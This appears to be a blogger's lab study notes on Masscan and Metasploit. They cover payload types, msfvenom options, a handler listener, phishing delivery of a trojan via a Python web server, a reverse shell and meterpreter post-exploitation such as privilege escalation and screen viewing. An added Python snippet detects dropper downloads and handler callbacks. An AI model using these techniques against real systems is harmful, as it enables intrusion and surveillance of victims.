Intranet penetration notes - MSF
2022-07-16 05:48:00 【Wang Zui Zui】
Masscan
Said to be able to sweep the entire Internet in five minutes.
Very high performance; the send rate can be capped (up to 1000w/s, i.e. 10,000,000 packets/s); the parameters mostly follow nmap.
-p 80,8000-8100 10.0.0.0/24
--max-rate=100000 // maximum packet-sending rate
masscan 0.0.0.0/0 -p 0-65535 // scans every port of the entire Internet. Don't try it.......
Metasploit(msf)

As soon as a vulnerability has a working exploit, it gets added right away: "point-and-click" attacks.
In the early days, exploiting a vulnerability meant you had to know its poc and exp yourself.
poc: vulnerability verification script (it only tells you that the vulnerability exists)
e.g. log4j: popping calc
exp: exploit script (the detailed exploitation procedure)
msf is divided into two parts:
msfconsole (the console)
msfvenom (the payload/Trojan generation platform, one-click Trojan)
metasploit v6.1.4-dev
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
exploit: exploit modules, used together with a payload
payload: the instructions or code executed after a successful exploit, e.g. a reverse shell; it can also be commands executed directly on the target system
- singles: all of the code is in one file (a "big" Trojan); limited by available memory space
- stagers: set up the connection over which the payload is transferred, so that our payload (the stages) is safely delivered to the target and run
- stages: the code (payload) that is transmitted once the stager has established its connection
auxiliary: auxiliary modules for information gathering; exploits that carry no payload
encoders: encoding modules; encode (obfuscate) the payload to evade antivirus detection
post: once a shell is obtained, run further attack commands (post-exploitation)
nops: no-op instructions, used as padding and obfuscation
evasion: AV evasion; works very well, but is time-limited; 100% bypass
msfdb (the msf database; stores the results of information gathering)
msfdb init  Initialize the database
service postgresql start  Start the database
msfdb run  Start the database and connect to it automatically
db_status  Check whether the database is connected
hosts, services  Query the scanned data
db_nmap == nmap (but plain nmap results are not stored in the database)
connect 192.168.111.131 4444  a small nc-like tool (this is a forward/bind connection)
Note: after initializing and starting the database, restart the console (exit, then msfconsole)

use exploit/multi/handler  the listener module
info
show options  both are commands for viewing the module's details and options
Common payload connection types
payload:
bind  forward (bind) connection
reverse  reverse connection
http  port 80
https  port 443
Payload naming format:
set payload <operating system>/[<architecture>/]<shell type>/<connection type>
meterpreter  an upgraded shell
LHOST: local IP; LPORT: local port
Configuration complete.
run  Start listening (or exploit)
msfvenom
Trojan generation platform
-p  set the payload
-a  architecture: x64 / x86
--platform  set the platform: windows / linux
-e  encoder
-i  number of encoding iterations
-f  output file format
-f raw -o 1.apk
R -o 1.apk
-o  output file (or redirect the output with >)
-l | --list  list details. Note! The generated payload must match the payload set in the console almost exactly.
For example, listening for a Windows Trojan while generating a Linux Trojan is obviously wrong.
lhost=  this machine's IP
rhost=  the target's IP. Take the payload set above as an example and build the Trojan.
OK, now comes the crucial question: how do you get the Trojan onto the victim's target machine?
The most common method: phishing.
Quickly start an http service in the current folder, i.e. set up a local web page:
python2.7 -m SimpleHTTPServer 8080
python3.9 -m http.server 8080

The target visits the temporary website.

Note: the Win7 target's firewall should be turned off in advance, otherwise Kali cannot ping Win7.
One strange point here: typing http://192.168.111.130:8080/ works, but typing 192.168.111.130:8080 cannot be accessed; it's a bit of a mystery.

Kali immediately shows the IP address that visited the page.

Kali starts listening.

The target machine downloads the Trojan and runs it.

Kali gets a reverse shell. Success!
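From the defender's side, the chain just described (a host fetches a dropper from a throwaway HTTP server, then calls back to a handler port) is exactly what should be correlated in logs. The following is an added example, not code from the original notes: it parses constructed python http.server-style access-log lines and constructed connection records, and flags any host that both downloaded a dropper-like file and opened an outbound connection on a typical handler port (4444 is the msf default; 80/443 for the http/https payloads above). The log formats, extensions and port set are assumptions.

```python
import re

# Constructed sample logs for this example (not taken from the original notes).
HTTP_LOG = """\
192.168.111.131 - - [16/Jul/2022 05:48:00] "GET / HTTP/1.1" 200 -
192.168.111.131 - - [16/Jul/2022 05:48:05] "GET /1.exe HTTP/1.1" 200 -
192.168.111.140 - - [16/Jul/2022 05:49:00] "GET /index.html HTTP/1.1" 200 -
"""
CONN_LOG = """\
2022-07-16T05:48:09 src=192.168.111.131 dst=192.168.111.130 dport=4444 proto=tcp
2022-07-16T05:49:02 src=192.168.111.140 dst=192.168.111.130 dport=8080 proto=tcp
"""

# Assumed formats: python http.server access lines and a simple key=value flow log.
HTTP_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')
CONN_RE = re.compile(r'src=(\S+) dst=(\S+) dport=(\d+)')

# File types an msfvenom-style dropper is usually written to (-f exe, -o 1.apk, ...).
DROPPER_EXT = (".exe", ".apk", ".elf", ".ps1", ".hta", ".msi")
# Ports commonly used by a handler (LPORT 4444 is Metasploit's default).
HANDLER_PORTS = {4444, 80, 443}


def parse_http(log):
    """Return (client_ip, path) for each successful GET in the access log."""
    hits = []
    for line in log.splitlines():
        m = HTTP_RE.match(line)
        if m and m.group(2) == "GET" and m.group(4) == "200":
            hits.append((m.group(1), m.group(3)))
    return hits


def parse_conn(log):
    """Return (src, dst, dport) for each connection record."""
    out = []
    for line in log.splitlines():
        m = CONN_RE.search(line)
        if m:
            out.append((m.group(1), m.group(2), int(m.group(3))))
    return out


def correlate(http_log, conn_log, ext=DROPPER_EXT, ports=HANDLER_PORTS):
    """Flag hosts that fetched a dropper-like file and also connected out on a handler port."""
    downloads = {(ip, path) for ip, path in parse_http(http_log) if path.lower().endswith(ext)}
    alerts = []
    for src, dst, dport in parse_conn(conn_log):
        for ip, path in downloads:
            if ip == src and dport in ports:
                alerts.append({"host": src, "file": path, "callback": f"{dst}:{dport}"})
    return alerts
```

Only the host that pulled 1.exe and then reached port 4444 is reported; the host that merely viewed index.html and talked to 8080 is not.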
shell
shell  ctrl+z  put the shell into the background
sessions  list the background connections
sessions -u ID  upgrade a shell session to meterpreter
meterpreter
meterpreter  bg  go back to the console
Information gathering
getuid
getsid
sysinfo
getsystem  one-click privilege escalation; the failure rate is high, try every technique
run vnc  live view of the target's screen
View it as a web page > live broadcast
screenshare
Commonly used post-exploitation information gathering